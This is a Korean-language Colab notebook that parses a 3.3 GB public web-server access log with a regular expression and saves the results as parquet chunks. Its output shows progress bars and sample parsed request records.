<a href="https://colab.research.google.com/github/Haebuk/Python_Machine_Learning/blob/master/logfile_practice.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

[kaggle dataset](https://www.kaggle.com/eliasdabbas/webserver-log-file-analysis)
# 주제 선정 이유
- [네이버 웹툰 개발 챌린지](https://programmers.co.kr/competitions/1472/2021-naver-webtoon-challenge)
- 2차 시험에서 로그 파일을 처리하는 문제가 나옴

# 라이브러리

In [2]:
import pandas as pd
import re
import os
import time
from tqdm import tqdm
# 파일 로드
for path, dir, filenames in os.walk('/content/drive/MyDrive/input/access.log'):
    for filename in filenames:
        logfile = os.path.join(path, filename)
        print(logfile)

/content/drive/MyDrive/input/access.log/access.log


`os.walk(input)`
- path: input
- dir: 폴더 리스트
- files: 파일 리스트

In [ ]:
def search(dirname):
    filenames = os.listdir(dirname)
    for filename in filenames:
        full_filename = os.path.join(dirname, filename)
        ext = os.path.splitext(full_filename)[-1]
        if ext == '.csv':
            print(full_filename)

search('/content/drive/MyDrive/input/')

('/content/drive/MyDrive/input/stage1_sample_submission', '.csv')
/content/drive/MyDrive/input/stage1_sample_submission.csv
('/content/drive/MyDrive/input/stage1_solution', '.csv')
/content/drive/MyDrive/input/stage1_solution.csv
('/content/drive/MyDrive/input/stage1_train_labels', '.csv')
/content/drive/MyDrive/input/stage1_train_labels.csv
('/content/drive/MyDrive/input/stage2_sample_submission_final', '.csv')
/content/drive/MyDrive/input/stage2_sample_submission_final.csv
('/content/drive/MyDrive/input/stage2_test_final', '')
('/content/drive/MyDrive/input/stage1_train', '')
('/content/drive/MyDrive/input/stage1_test', '')
('/content/drive/MyDrive/input/mnist', '')
('/content/drive/MyDrive/input/hymenoptera_data', '')
('/content/drive/MyDrive/input/intel', '')
('/content/drive/MyDrive/input/.ipynb_checkpoints', '')
('/content/drive/MyDrive/input/programmers', '')
('/content/drive/MyDrive/input/dataminingTP', '')
('/content/drive/MyDrive/input/goodbooks10k', '')
('/content/drive/MyDr

- `os.listdir(dirname)`: `dirname`에 위치한 파일 목록 열거
- `os.path.join(dirname, filename)`: `dirname`과 `filename` 경로를 이어줌
- `os.path.splitext`: 파일명을 파일이름과 확장자명 두가지로 나눠줌

# File Check

In [3]:
!ls -lsSh /content/drive/MyDrive/input/access.log/access.log

3.3G -rw------- 1 root root 3.3G Jul 16 01:08 /content/drive/MyDrive/input/access.log/access.log


- 파일의 용량이 3.3G로 큼

In [9]:
!head -n 4 /content/drive/MyDrive/input/access.log/access.log

54.36.149.41 - - [22/Jan/2019:03:56:14 +0330] "GET /filter/27|13%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,27|%DA%A9%D9%85%D8%AA%D8%B1%20%D8%A7%D8%B2%205%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,p53 HTTP/1.1" 200 30577 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)" "-"
31.56.96.51 - - [22/Jan/2019:03:56:16 +0330] "GET /image/60844/productModel/200x200 HTTP/1.1" 200 5667 "https://www.zanbil.ir/m/filter/b113" "Mozilla/5.0 (Linux; Android 6.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36" "-"
31.56.96.51 - - [22/Jan/2019:03:56:16 +0330] "GET /image/61474/productModel/200x200 HTTP/1.1" 200 5379 "https://www.zanbil.ir/m/filter/b113" "Mozilla/5.0 (Linux; Android 6.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36" "-"
40.77.167.129 - - [22/Jan/2019:03:56:17 +0330] "GET /image/14925/productModel/100x100 HTTP/1.1" 200 1696 

# Line Parsing

In [4]:
# 정규표현식
regex = '^(?P<client>\S+) - - \[(?P<datetime>[^*]+)\] "(?P<method>[A-Z]+) (?P<request>\S+) HTTP/[0-9.]+" (?P<status>[0-9]{3}) (?P<size>[0-9]+) "(?P<url>\S+)" "(?P<useragent>[^"]*)"'
# 나중에 데이터프레임에 컬럼명으로 쓸 리스트 설정
columns = ['client', 'datetime', 'method', 'request', 'status', 'size', 'url', 'useragent']

## 정규표현식
- `^`: 시작을 나타냄
- `?P<tag>`: 정규표현식에서의 주석같은 느낌. 길어지면 어느 부분을 의미하는지 알기 힘드므로 이를 설명하는 역할
- `\S+`: 공백을 제외한 모든 문자, 뒤의 `+`는 반복을 의미 
- `^(?P<client>\S+)`: 클라이언트로 처리하는 부분은 공백이 아닌 모든 문자임. 
- `[^*]+`: `*`을 제외한 모든 문자
- `[A-Z]`: 알파벳 대문자만 포함 
- `[0-9.]{3}`: 숫자와 `.`만 포함, `{3}`은 문자가 3번 반복됨을 의미 

- 정규표현식을 실시간으로 확인할 수 있는 사이트: https://regexr.com/, 단 태그는 인식 못함  

In [5]:
# parquet_dir 경로 생성
%mkdir parquet_dir

In [6]:
def logs_to_df(logfile, output_dir, errors_file):
    """
    .log파일을 읽어서 .parquet파일로 변환하는 함수
    25만 행마다 .parquet파일로 저장하고 리스트를 초기화하여 메모리절약 시도
    
    Input:
    - logfile: 변환할 로그 파일 
    - output_dir: parquet파일이 저장될 경로
    - errors_file: 에러파일이 저장될 경로

    """
    with open(logfile) as source_file:
        linenumber = 0 # 행 번호
        parsed_lines = [] # 파싱된 로그를 행 별로 저장할 리스트
        for line in tqdm(source_file):
            try:
                log_line = re.findall(regex, line)[0] # 정규표현식을 통한 라인 파싱, [0]을 해야 행 별로 리스트에 저장 가능
                parsed_lines.append(log_line)
                if linenumber % 200000 == 0: # 20만행마다 로그 찍어봄
                    print(log_line)
            except Exception as e: # 예외가 발생한 경우(정규표현식으로 처리하지 못한 경우)
                with open(errors_file, 'at') as errfile: # 에러파일 쓰기(추가)형태로 open
                    print((line, str(e)), file=errfile) # 어떤 line에 무슨에러가 발생했는지 적음
                continue
            linenumber += 1
            if linenumber % 250000 == 0: # 25만행마다 파싱된 리스트를 parquet파일로 저장
                df = pd.DataFrame(parsed_lines, columns=columns)
                df.to_parquet(f'{output_dir}/file_{linenumber}.parquet')
                parsed_lines.clear() # 메모리 절약을 위해 리스트 초기화
        else: # 마지막 로그가 25만행이 안 될 경우(모자랄 경우)
            df = pd.DataFrame(parsed_lines, columns=columns) 
            df.to_parquet(f'{output_dir}/file_{linenumber}.parquet') # 남는 라인을 parquet파일로 저장
            parsed_lines.clear() # 메모리 절약을 위해 리스트 초기화


In [10]:
%time logs_to_df(logfile=logfile, output_dir='parquet_dir', errors_file='errors.txt')

0it [00:00, ?it/s]

('54.36.149.41', '22/Jan/2019:03:56:14 +0330', 'GET', '/filter/27|13%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,27|%DA%A9%D9%85%D8%AA%D8%B1%20%D8%A7%D8%B2%205%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,p53', '200', '30577', '-', 'Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)')


214573it [00:03, 105573.03it/s]

('5.211.161.138', '22/Jan/2019:09:03:17 +0330', 'GET', '/image/54258/productModel/150x150', '200', '3811', 'https://www.zanbil.ir/m/product/26784/54745/%D9%85%D8%A7%D8%B4%DB%8C%D9%86-%D9%84%D8%A8%D8%A7%D8%B3%D8%B4%D9%88%DB%8C%DB%8C-%D8%AF%D8%B1%D8%A8-%D8%A7%D8%B2-%D8%AC%D9%84%D9%88-%D8%B3%D8%A7%D9%85%D8%B3%D9%88%D9%86%DA%AF-%D9%85%D8%AF%D9%84-B1253-W', 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1')


412961it [00:06, 107099.56it/s]

('2.177.185.120', '22/Jan/2019:10:28:08 +0330', 'GET', '/settings/logo', '200', '4120', 'https://www.zanbil.ir/m/browse/Teen-Furniture/%D9%85%D8%A8%D9%84%D9%85%D8%A7%D9%86-%DA%A9%D9%88%D8%AF%DA%A9-%D9%88-%D9%86%D9%88%D8%AC%D9%88%D8%A7%D9%86-', 'Mozilla/5.0 (Android 6.0.1; Mobile; rv:64.0) Gecko/64.0 Firefox/64.0')


613151it [00:10, 96031.92it/s]

('2.188.27.28', '22/Jan/2019:11:42:46 +0330', 'GET', '/static/images/guarantees/bestPrice.png', '200', '7356', 'https://www.zanbil.ir/filter/b88', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36')


807731it [00:12, 84015.44it/s]

('92.114.26.96', '22/Jan/2019:12:56:29 +0330', 'GET', '/static/images/guarantees/bestPrice.png', '200', '7356', 'https://www.zanbil.ir/browse/home-appliances/%D9%84%D9%88%D8%A7%D8%B2%D9%85-%D8%AE%D8%A7%D9%86%DA%AF%DB%8C', 'Mozilla/5.0 (Windows NT 6.1; rv:64.0) Gecko/20100101 Firefox/64.0')


1021633it [00:16, 37776.68it/s]

('2.181.160.157', '22/Jan/2019:14:11:45 +0330', 'GET', '/image/29044/productTypeMenu', '200', '11', 'https://www.zanbil.ir/browse/analog-watch/%D8%B3%D8%A7%D8%B9%D8%AA-%D9%85%DA%86%DB%8C-%D8%B9%D9%82%D8%B1%D8%A8%D9%87-%D8%A7%DB%8C', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko')


1220519it [00:18, 114792.78it/s]

('46.225.241.66', '22/Jan/2019:15:32:21 +0330', 'GET', '/site/alexaGooleAnalitic', '200', '323', 'https://www.zanbil.ir/product/33722/%DB%8C%D8%AE%DA%86%D8%A7%D9%84-%D9%81%D8%B1%DB%8C%D8%B2%D8%B1-%D8%B3%D8%A7%DB%8C%D8%AF-%D8%A8%D8%A7%DB%8C-%D8%B3%D8%A7%DB%8C%D8%AF-%D8%A7%D8%B3%D9%86%D9%88%D8%A7-%D9%85%D8%AF%D9%84-COUNTER-S8-2280', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36')


1420363it [00:20, 105119.37it/s]

('5.236.88.147', '22/Jan/2019:17:03:48 +0330', 'GET', '/image/32757?name=eb-x41-4.jpg&wh=200x200', '200', '3763', '-', 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; H60-L04 Build/HDH60-L04)')


1613373it [00:23, 95553.46it/s]

('185.141.171.86', '22/Jan/2019:18:47:16 +0330', 'GET', '/image/18781/productType/120x90', '200', '15705', 'https://www.zanbil.ir/m/product/31023/%DA%AF%D9%88%D8%B4%DB%8C-%D9%85%D9%88%D8%A8%D8%A7%DB%8C%D9%84-%D9%87%D9%88%D8%A7%D9%88%DB%8C-%D9%85%D8%AF%D9%84-Y3II-Dual-8GB-%28LUA-L21%29', 'Mozilla/5.0 (Linux; U; Android 4.2.2; fa-ir; MediaPad X1 7.0 Build/HuaweiMediaPad) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30')


1818768it [00:27, 53564.57it/s]

('188.159.169.71', '22/Jan/2019:20:34:47 +0330', 'GET', '/image/32553/productType/240x180', '200', '10993', 'https://www.zanbil.ir/m/browse/home-appliances', 'Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36')


2018021it [00:30, 41686.18it/s]

('83.121.240.14', '22/Jan/2019:22:28:50 +0330', 'GET', '/m/event/Lg-festival-home?page=2', '200', '15726', '-', 'Mozilla/5.0 (Linux; Android 7.0; TRT-L21A Build/HUAWEITRT-L21A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Mobile Safari/537.36')


2213674it [00:31, 120266.70it/s]

('5.75.34.134', '23/Jan/2019:00:29:59 +0330', 'GET', '/image/29620?name=-1%D8%B3%D9%88%D9%BE%D8%B1-%DA%A9%D9%84%D8%A7%D8%B3-%D9%87%D8%A7%D8%B1%D8%AF.jpg&wh=50x50', '200', '1001', 'https://www.zanbil.ir/product/29620/59054/%D8%AA%D8%B4%DA%A9-%DB%8C%DA%A9-%D9%86%D9%81%D8%B1%D9%87-%D8%AE%D9%88%D8%B4%D8%AE%D9%88%D8%A7%D8%A8-%D9%85%D8%AF%D9%84-%D8%B3%D9%88%D9%BE%D8%B1-%DA%A9%D9%84%D8%A7%D8%B3-%D9%87%D8%A7%D8%B1%D8%AF-%D8%B3%D8%A7%DB%8C%D8%B2-90*200', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 OPR/57.0.3098.116')


2411924it [00:34, 121531.10it/s]

('37.255.118.123', '23/Jan/2019:07:02:30 +0330', 'GET', '/image/33888?name=model-b2048u-1-.jpg&wh=200x200', '200', '3975', '-', 'Dalvik/2.1.0 (Linux; U; Android 6.0.1; MI 4W MIUI/V9.5.7.0.MXDMIFA)')


2619839it [00:37, 99239.30it/s]

('31.7.116.37', '23/Jan/2019:09:36:46 +0330', 'GET', '/image/%7B%7BbasketItem.id%7D%7D?type=productModel&wh=50x50', '200', '5', 'https://www.zanbil.ir/product/31990/%D8%BA%D8%B0%D8%A7-%D8%B3%D8%A7%D8%B2-%DA%A9%D9%86%D9%88%D9%88%D8%AF-%D9%85%D8%AF%D9%84-FP190', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0')


2816518it [00:40, 71001.25it/s]

('185.12.61.231', '23/Jan/2019:10:57:30 +0330', 'GET', '/image/41/brand', '200', '2946', 'https://www.zanbil.ir/filter/b74', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36')


3020163it [00:43, 36276.55it/s]

('5.232.43.66', '23/Jan/2019:12:09:10 +0330', 'GET', '/image/1215/mainSlide', '200', '90970', 'https://www.zanbil.ir/filter/b20', 'Mozilla/5.0 (Windows NT 6.1; rv:64.0) Gecko/20100101 Firefox/64.0')


3218064it [00:45, 114424.66it/s]

('80.253.131.3', '23/Jan/2019:13:26:21 +0330', 'GET', '/image/65359/productModel/150x150', '200', '4558', 'https://www.zanbil.ir/browse/digital-camera/%D8%AF%D9%88%D8%B1%D8%A8%DB%8C%D9%86-%D8%B9%DA%A9%D8%A7%D8%B3%DB%8C', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36')


3418589it [00:48, 110301.03it/s]

('78.38.138.147', '23/Jan/2019:14:45:15 +0330', 'GET', '/static/images/not-exists.png', '200', '2471', 'https://www.zanbil.ir/search/%DA%AF%D9%88%D8%B4%DB%8C-a6/p0', 'Mozilla/5.0 (Windows NT 6.1; rv:64.0) Gecko/20100101 Firefox/64.0')


3618007it [00:50, 96429.03it/s]

('217.219.180.112', '23/Jan/2019:16:11:28 +0330', 'GET', '/static/images/amp/telegram.png', '200', '4859', 'https://www.zanbil.ir/product/31581/%DA%AF%D9%88%D8%B4%DB%8C-%D9%85%D9%88%D8%A8%D8%A7%DB%8C%D9%84-%D8%A7%D9%84-%D8%AC%DB%8C-%D9%85%D8%AF%D9%84-%28G6-Plus-128GB-%28H870DSU', 'Mozilla/5.0 (Windows NT 6.1; rv:64.0) Gecko/20100101 Firefox/64.0')


3818540it [00:55, 76234.55it/s]

('77.104.65.104', '23/Jan/2019:17:45:43 +0330', 'GET', '/image/777/mainSlide', '200', '312763', 'https://www.zanbil.ir/browse/telephone/%DA%AF%D9%88%D8%B4%DB%8C-%D8%AA%D9%84%D9%81%D9%86', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0')


4012357it [00:57, 39826.81it/s]

('2.178.242.206', '23/Jan/2019:19:34:35 +0330', 'GET', '/site/alexaGooleAnalitic', '200', '323', 'https://www.zanbil.ir/browse/aroma-therapy/%D9%87%D9%88%D8%A7-%D9%88-%D8%B1%D8%A7%DB%8C%D8%AD%D9%87-%D8%AF%D8%B1%D9%85%D8%A7%D9%86%DB%8C', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36')


4223513it [00:59, 118512.77it/s]

('204.18.140.161', '23/Jan/2019:21:24:25 +0330', 'GET', '/discountLabel/get/3?type=mobileSmallIcon', '200', '4336', 'https://www.zanbil.ir/m/product/34288/65271/%DA%AF%D9%88%D8%B4%DB%8C-%D9%85%D9%88%D8%A8%D8%A7%DB%8C%D9%84-%D8%B3%D8%A7%D9%85%D8%B3%D9%88%D9%86%DA%AF-%D9%85%D8%AF%D9%84-Galaxy-J4-%282018%29-Dual-32GB-%28J400%29', 'Mozilla/5.0 (Linux; U; Android 4.3; fa-ir; G630-U10 Build/HuaweiG630-U10) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30')


4406789it [01:02, 50110.99it/s]

('109.125.154.205', '23/Jan/2019:23:09:33 +0330', 'GET', '/image/64498/productModel/200x200', '200', '7470', 'https://www.zanbil.ir/m/filter/b126%2Cb41%2Cb52%2Cp65%2Cb67', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-J700H Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/8.2 Chrome/63.0.3239.111 Mobile Safari/537.36')


4617533it [01:05, 101929.09it/s]

('95.64.2.86', '24/Jan/2019:01:33:59 +0330', 'GET', '/image/58830/productModel/100x100', '200', '2226', 'https://www.zanbil.ir/filter/b6,p73', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Safari/537.36')


4810743it [01:08, 81390.45it/s]

('2.179.237.76', '24/Jan/2019:08:52:09 +0330', 'GET', '/static/images/amp/blog.png', '200', '3863', 'https://www.zanbil.ir/browse/bronze-clock/%D8%B3%D8%A7%D8%B9%D8%AA-%D8%A8%D8%B1%D9%86%D8%B2', 'Mozilla/5.0 (Windows NT 6.1; rv:64.0) Gecko/20100101 Firefox/64.0')


5016000it [01:10, 39710.85it/s]

('178.131.89.66', '24/Jan/2019:10:47:36 +0330', 'GET', '/image/56531/productModel/200x200', '200', '2975', 'https://www.zanbil.ir/m/browse/electric-shavers/%D9%85%D8%A7%D8%B4%DB%8C%D9%86-%D8%A7%D8%B5%D9%84%D8%A7%D8%AD', 'Mozilla/5.0 (Linux; Android 7.1.1; MI MAX 2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36')


5206680it [01:13, 42518.57it/s]

('159.65.239.189', '24/Jan/2019:12:18:02 +0330', 'GET', '/amp-helper-frame.html?appId=a624a1c1-0c93-466a-a546-e146710f97e6&parentOrigin=https://www-zanbil-ir.cdn.ampproject.org', '200', '133', 'https://www-zanbil-ir.cdn.ampproject.org/v/s/www.zanbil.ir/m/product/10502/%D8%A7%D8%AA%D9%88-%D9%85%D9%88-%D9%81%DB%8C%D9%84%DB%8C%D9%BE%D8%B3-%D9%85%D8%AF%D9%84-HP8316?amp_js_v=a2&amp_gsa=1&usqp=mq331AQCCAE%3D', 'Mozilla/5.0 (Linux; Android 8.0.0; SM-A720F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.91 Mobile Safari/537.36')


5413123it [01:16, 99153.46it/s]

('94.183.161.158', '24/Jan/2019:13:58:27 +0330', 'GET', '/static/images/guarantees/pos.png', '200', '6465', 'https://www.zanbil.ir/browse/refrigerator-and-freezer/%DB%8C%D8%AE%DA%86%D8%A7%D9%84-%D9%81%D8%B1%DB%8C%D8%B2%D8%B1', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36')


5620522it [01:19, 104511.59it/s]

('2.177.172.132', '24/Jan/2019:15:46:16 +0330', 'GET', '/image/105/brand', '200', '2653', 'https://www.zanbil.ir/m/filter/b36%2Cp5', 'Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1')


5824068it [01:22, 93002.77it/s]

('5.123.178.16', '24/Jan/2019:18:05:24 +0330', 'GET', '/static/css/font/wyekan/font.woff', '200', '28536', 'https://www.zanbil.ir/m/filter/b105', 'Mozilla/5.0 (Linux; Android 8.1.0; SM-J530F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36')


6017250it [01:25, 28457.42it/s]

('89.196.66.181', '24/Jan/2019:20:22:59 +0330', 'GET', '/image/63112/productModel/200x200', '200', '5706', 'https://www.zanbil.ir/m/browse/tv/%D8%AA%D9%84%D9%88%DB%8C%D8%B2%DB%8C%D9%88%D9%86', 'Mozilla/5.0 (Linux; Android 4.4.2; HUAWEI Y625-U32) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36')


6221518it [01:26, 115165.24it/s]

('5.117.66.116', '24/Jan/2019:22:32:56 +0330', 'GET', '/apple-touch-icon.png', '404', '392', '-', 'MobileSafari/604.1 CFNetwork/976 Darwin/18.2.0')


6419061it [01:29, 114922.01it/s]

('5.232.105.44', '25/Jan/2019:00:31:03 +0330', 'GET', '/static/images/amp/telegram.png', '200', '4859', 'https://www.zanbil.ir/m/browse/cell-phone/%DA%AF%D9%88%D8%B4%DB%8C-%D9%85%D9%88%D8%A8%D8%A7%DB%8C%D9%84', 'Mozilla/5.0 (Linux; Android 4.4.4; GT-I9060I Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.109 Mobile Safari/537.36')


6615771it [01:32, 88601.00it/s]

('5.127.241.218', '25/Jan/2019:06:26:19 +0330', 'GET', '/image/614/brand', '200', '2088', 'https://www.zanbil.ir/m/filter/b32%2Cp1', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-N920C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.80 Mobile Safari/537.36')


6814608it [01:36, 72313.45it/s]

('141.255.162.34', '25/Jan/2019:10:45:38 +0330', 'GET', '/product/20582/44691/%DA%AF%D9%88%D8%B4%DB%8C-%D8%AA%D9%84%D9%81%D9%86-%D8%A8%DB%8C-%D8%B3%DB%8C%D9%85-%DA%AF%DB%8C%DA%AF%D8%A7%D8%B3%D8%AA-%D9%85%D8%AF%D9%84-AS405AM', '200', '42184', '-', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0)Gecko/16.0 Firefox/16.0')


7019797it [01:38, 44531.06it/s]

('192.160.102.169', '25/Jan/2019:12:53:23 +0330', 'GET', '/product/32497/62875/%DA%A9%D9%88%D9%84%D8%B1-%DA%AF%D8%A7%D8%B2%DB%8C-%D8%A7%D8%B3%D9%BE%D9%84%DB%8C%D8%AA-%D8%B3%D8%A7%D9%85%D8%B3%D9%88%D9%86%DA%AF-%D9%85%D8%AF%D9%84-AR10MSFHE', '200', '44204', '-', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0)Gecko/16.0 Firefox/16.0')


7209219it [01:40, 120517.23it/s]

('66.249.66.91', '25/Jan/2019:14:48:37 +0330', 'GET', '/static/css/font/wyekan/font.woff', '304', '0', '-', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)')


7412635it [01:42, 114996.02it/s]

('2.187.68.96', '25/Jan/2019:16:50:44 +0330', 'GET', '/image/9405/productModel/100x100', '200', '1900', 'https://www.zanbil.ir/browse/kitchen-equipment', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0')


7612966it [01:45, 101331.02it/s]

('40.77.167.156', '25/Jan/2019:18:53:22 +0330', 'GET', '/blog/accessories/bags-and-suitcase/backpack/backpack-laptop/', '200', '20310', '-', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)')


7810993it [01:49, 49838.36it/s]

('5.213.77.119', '25/Jan/2019:20:35:52 +0330', 'GET', '/favicon.ico', '200', '0', '-', 'MobileSafari/604.1 CFNetwork/976 Darwin/18.2.0')


8018079it [01:52, 45074.94it/s]

('66.249.66.194', '25/Jan/2019:22:18:57 +0330', 'GET', '/m/browse/liturgy-of-khwaja-abdullah-ansari/%D9%85%D9%86%D8%A7%D8%AC%D8%A7%D8%AA-%D9%86%D8%A7%D9%85%D9%87-%D8%AE%D9%88%D8%A7%D8%AC%D9%87-%D8%B9%D8%A8%D8%AF%D8%A7%D9%84%D9%84%D9%87-%D8%A7%D9%86%D8%B5%D8%A7%D8%B1%DB%8C', '200', '17844', '-', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)')


8222418it [01:54, 119130.27it/s]

('178.131.192.115', '26/Jan/2019:00:05:40 +0330', 'GET', '/image/64369/productModel/150x150', '200', '3481', 'https://www.zanbil.ir/search/%D8%B1%DB%8C%D8%B4-%D8%AA%D8%B1%D8%A7%D8%B4-/p0', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36')


8422020it [01:56, 116762.49it/s]

('66.249.66.194', '26/Jan/2019:04:47:54 +0330', 'GET', '/m/filter/585%7C1500-1800%2Cp10%2C585%7C1500?o=585', '302', '0', '-', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)')


8611754it [01:59, 99670.99it/s]

('151.239.241.163', '26/Jan/2019:09:14:21 +0330', 'GET', '/rapidGrails/jsonList?maxColumns=16&domainClass=eshop.Order&filter=[{op:%27inSession%27,%20field:%27id%27,%20val:%27orderListd90380ac5952423a9c6908d62e92747d%27}]&columns=[{%27name%27:%27trackingCode%27,%27width%27:110},{%27name%27:%27ownerName%27,%27width%27:120},{%27name%27:%27productsName%27,%27width%27:320,%27sortable%27:false},{%27name%27:%27ownerMobile%27,%27width%27:110},{%27name%27:%27deliveryMethodName%27,%27width%27:120,%27sortable%27:false},{%27name%27:%27deliveryCityName%27,%27width%27:120,%27sortable%27:false},{%27name%27:%27addressRegionName%27,%27width%27:120,%27sortable%27:false},{%27name%27:%27courier%27,%27width%27:120,%27expression%27:%27obj[\\x5C%27courier\\x5C%27]?.fullName%27},{%27name%27:%27status%27,%27width%27:110},{%27name%27:%27invoiceType%27,%27width%27:60,%27expression%27:%27g.message(code:%20obj[\\x5C%27invoiceTypeCode\\x5C%27])%27},{%27name%27:%27itemsDeliveryStatus%27,%27width%27:60},{%27name%27:%

8819167it [02:03, 45842.94it/s]

('5.117.111.102', '26/Jan/2019:10:34:29 +0330', 'GET', '/m/product/28935/58001/%D9%85%D8%A7%D8%B4%DB%8C%D9%86-%D8%B8%D8%B1%D9%81%D8%B4%D9%88%DB%8C%DB%8C-%D8%B1%D9%88%D9%85%DB%8C%D8%B2%DB%8C-%D8%A8%D9%88%D8%B4-%D9%85%D8%AF%D9%84-SKS62E28IR', '200', '21697', 'https://www.zanbil.ir/m/filter/p5%2Cb36?name=%D9%85%D8%A7%D8%B4%DB%8C%D9%86-%D8%B8%D8%B1%D9%81%D8%B4%D9%88%DB%8C%DB%8C&productType=dishwasher', 'Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/71.0.3578.89 Mobile/15E148 Safari/605.1')


9013215it [02:06, 39625.63it/s]

('66.249.66.91', '26/Jan/2019:11:43:02 +0330', 'GET', '/static/css/font/wyekan/font.woff', '304', '0', '-', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)')


9212699it [02:08, 110574.84it/s]

('74.82.4.29', '26/Jan/2019:12:53:09 +0330', 'GET', '/image/62998/productModel/200x200', '200', '4528', 'https://www.zanbil.ir/m/filter/b41%2Cb43%2Cb74%2Cp7', 'Mozilla/5.0 (Linux; Android 5.1.1; SM-J120F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36')


9413727it [02:10, 99165.51it/s]

('46.209.74.99', '26/Jan/2019:13:56:28 +0330', 'GET', '/image/51487/productModel/150x150', '200', '2966', 'https://www.zanbil.ir/browse/home-theater-system/%D8%B3%DB%8C%D9%86%D9%85%D8%A7-%D8%AE%D8%A7%D9%86%DA%AF%DB%8C', 'Mozilla/5.0 (Windows NT 6.1; rv:61.0) Gecko/20100101 Firefox/61.0')


9623010it [02:14, 93397.58it/s]

